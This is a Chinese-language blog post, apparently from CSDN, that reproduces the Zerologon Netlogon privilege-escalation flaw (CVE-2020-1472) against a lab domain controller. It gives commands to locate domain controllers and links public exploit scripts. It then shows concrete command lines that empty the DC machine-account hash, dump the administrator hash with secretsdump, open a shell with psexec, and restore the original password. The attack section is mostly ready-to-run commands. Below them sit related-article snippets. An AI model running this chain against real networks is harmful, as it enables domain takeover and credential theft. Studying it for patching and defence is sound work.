CVE-2020-1472NetLogon权限提升漏洞

最新推荐文章于 2023-08-10 22:25:05 发布
最新推荐文章于 2023-08-10 22:25:05 发布
阅读量612 收藏 1
点赞数
文章标签: python udp tcp/ip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/myfox0630/article/details/115084962
版权

0x01 概述

    2020年8月12日,阿里云应急响应中心监测到微软发布补丁修复了NetLogon权限提升漏洞(CVE-2020-1472),CVSS评分10,官方评级严重。攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行相应代码或者程序。

    此漏洞用于域控提权,完整利用此漏洞域控需开启135和445端口。

    此漏洞的所有脚本用python3.7不会存在报错。

0x02 检测漏洞是否存在

  • 如果该机器同时开放53,135,445的话,很大概率就是域控

  • 如果知道域名的话,可以尝试通过dns查询

    Linux下命令有dig 域名 ns dig _ldap._tcp.域名 srvWindows下命令有nslookup –qt=ns 域名Nslookup -type=SRV _ldap._tcp.域名

  •   如果我们控制了一台域成员机器,可以直接查询。

  • net time /domainnet group "Domain controllers" /domain dsquery server -o rdnadfind -sc dclistNltest /dclist:域名

    脚本地址:https://github.com/SecuraBV/CVE-2020-1472

#python zerologon_tester.py 域控主机名 域控主机ippython zerologon_tester.py ad01 192.168.85.129

出现success证明漏洞存在。

0x03 置空域控哈希

    脚本地址:https://github.com/0xkami/CVE-2020-1472

#python 2.py 域控主机名 域控主机名$ 域控主机ip python 2.py ad01 ad01$ 192.168.85.129挂socks5代理proxychains4 -q python 2.py ad01 ad01$ 192.168.85.129

0x04 导出域内哈希并连接域控

    脚本地址:https://github.com/SecureAuthCorp/impacket

    Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。

    这里使用examples文件夹下的secretsdump.py和psexec.py

使用空哈希导出administrator用户哈希#python secretsdump.py "域名/域用户主机名"@域用户ip地址 -hashes 空值的哈希 -just-dc-user "administrator用户名"python secretsdump.py "ka/ad01$"@192.168.85.129 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc-user "administrator"

连接域控#python psexec.py 域名/administrator用户@域ip地址 -hashes 导出的administrator用户的哈希python psexec.py ka/administrator@192.168.85.129 -hashes aad3b435b51404eeaad3b435b51404ee:7ecffff0c354887607a14bad0f88bb1

0x05 恢复域控哈希

    使用zerologon底下的reinstall_original_pw.py再打一次,计算密码的时候使用空密码的hash去结算session_key。直接使用机器账号的原始NTLM

哈希还原。

    脚本地址:https://github.com/risksense/zerologon

python reinstall_original_pw.py ad01 192.168.85.129 d0aeb0472d4400ec08b2f9fe8ed17655

查看发现ad的密码已经恢复了

python secretsdump.py ka/administrator:1qaz@WSX3edc@192.168.85.129 -just-dc-user "ad01$"

参考文章:https://xie1997.blog.csdn.net/article/details/109030009

                 https://mp.weixin.qq.com/s/S9Hwb1-lLhh4QfI4b551SQ

超人你内裤掉了
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-1472 NetLogon 特权提升漏洞1
08-03
CVE-2020-1472 NetLogon 特权提升漏洞1
CVE-2020-1472: NetLogon特权提升漏洞通告
爱国小白帽
08-12 1万+
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-081202 报告来源:360CERT 报告作者:360CERT 更新日期:2020-08-12 0x01 漏洞简述 2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472漏洞等级:严重,漏洞评分:10分。 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,
CVE-2020-1472 NetLogon 权限提升漏洞
梅花寺
08-10 716
Key对其进行AES加密,得到的结果中的第一个字节与8字节的明文input(其实就是Challenge)的第一个字节进行异或运算,将异或的结果放在IV末尾,IV整体向前移一个字节,得到新的IV。(2)重置域控Hash确定目标域控存在NetLogon权限提升,使用CVE-2020-1472.py脚本执行如下命令对其攻击:python3 cve-2020-1472-exploit.py DC 192.168.41.10结果如图所示,该脚本会将目标域控的机器账户的Hash置空,可以看到攻击成功。
CVE-2020-1472 | Netlogon 特权提升漏洞预警
荒野求生的博客
11-07 302
CVE-2020-1472 | Netlogon 特权提升漏洞预警 CVE-2020-1472 | Netlogon 特权提升漏洞预警 https://www.cnblogs.com/micr067/p/13677467.html 0x01 简介 CNVD:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202008-548 NetLogon组件是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及...
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7096
0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机域密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-1472: NetLogon特权提升漏洞(附exp复现)
热门推荐
02-06 2万+
漏洞描述: 2020年08月12日, 微软官方发布了 NetLogon 特权提升漏洞 的风险通告。攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 漏洞级别:严重 漏洞编号:CVE-2020-1472 漏洞复现: 准备工具: Impacket工具包:htt...
Windows NetLogon权限提升漏洞CVE-2020-1472
Websec
09-15 1501
漏洞描述 微软官方于8月12日发布安全更新,其中修复了一个修复了NetLogon权限提升漏洞CVE-2020-1472),攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行相应代码或者程序。同时,微软8月补丁中还涉及其他多个高危漏洞,Windows 用户尽快安装补丁阻止漏洞攻击。 漏洞评级 CVE-2020-1472 严重 影响版本 Windows Server 2008 R2..
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
使用Impacket库测试Zerologon漏洞CVE-2020-1472)的漏洞Python脚本。 它尝试执行Netlogon身份验证绕过。 成功执行旁路时,脚本将立即终止,并且不执行任何Netlogon操作。 修补域控制器后,检测脚本将在发送2000...
ZeroLogon (CVE-2020-1472) 漏洞利用
Captain_RB的博客
10-24 1万+
ZeroLogon (CVE-2020-1472) 是近几年Windows上曝出的高危漏洞,CVSS V3.0评分10.0,攻击者只需要定位域控主机名及IP,并且可以访问域控,就可以在无需任何凭据的情况下 (可在域外) 拿到域管理员的权限
(环境搭建+复现)CVE-2020-1472 NetLogon 域内提权漏洞
daxi0ng的博客
01-25 3889
0x00 简介 Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。 Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote procedure call protocol,远程过程调用协议,允许像调用本地服务一样调用远程服务)接口,用于对域中的用户和其他服务进行身份验证,最常见的是方便用户使用NTLM(N...
CVE-2020-1472 Netlogon权限提升漏洞分析
further_eye的博客
11-09 1095
漏洞主要是由于在使用Netlogon安全通道与域控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将域控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员权限。成功的利用可以实现以管理员权限登录域控设备,并进一步控制整个域。
关于windows server 2016 更新CVE-2020-1472漏洞补丁的问题 
荒野求生的博客
11-13 3093
关于windows server 2016 更新CVE-2020-1472漏洞补丁的问题 https://social.technet.microsoft.com/Forums/officesharepoint/zh-CN/c17eb6b8-f811-460b-824f-d92e2b07a527/2085120110windows-server-2016?forum=WinServerPreviewZHCN Windows Server > Windows Server Technic...
CVE-2020-1472 NetLogon特权提升漏洞 复现
mukami0621的博客
09-15 4955
CVE-2020-1472漏洞复现 用了大半天时间,开局一张图,复现全靠蒙: 参考宽字节安全的推文:https://mp.weixin.qq.com/s/MSLbzg2hCoTSVTtEIxxpNQ 1、搭建一个windows的域环境 参考:https://blog.csdn.net/wwl012345/article/details/88934571 发现电脑里有一个win2008r2的虚拟机,就用这个了 更改随意IP和DNS 添加角色 根据提示,运行dcpromo.exe添加DNS服务器 记录域
CVE-2020-1472 域内提权
网络安全。
09-16 6142
0x1 工具 这里使用zerologon_tester(https://github.com/SecuraBV/CVE-2020-1472)工具验证漏洞是否存在,使用zerologon(https://github.com/risksense/zerologon)工具复现。 运行set_empty_pw.py脚本需要最新版的impacket(https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce
Ladon插件-CVE-2020-1472域控提权漏洞EXP
K8哥哥
09-16 1272
漏洞简述 2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472漏洞等级:严重,漏洞评分:10分。 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pac
CVE-2020-1472
最新发布
08-30
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值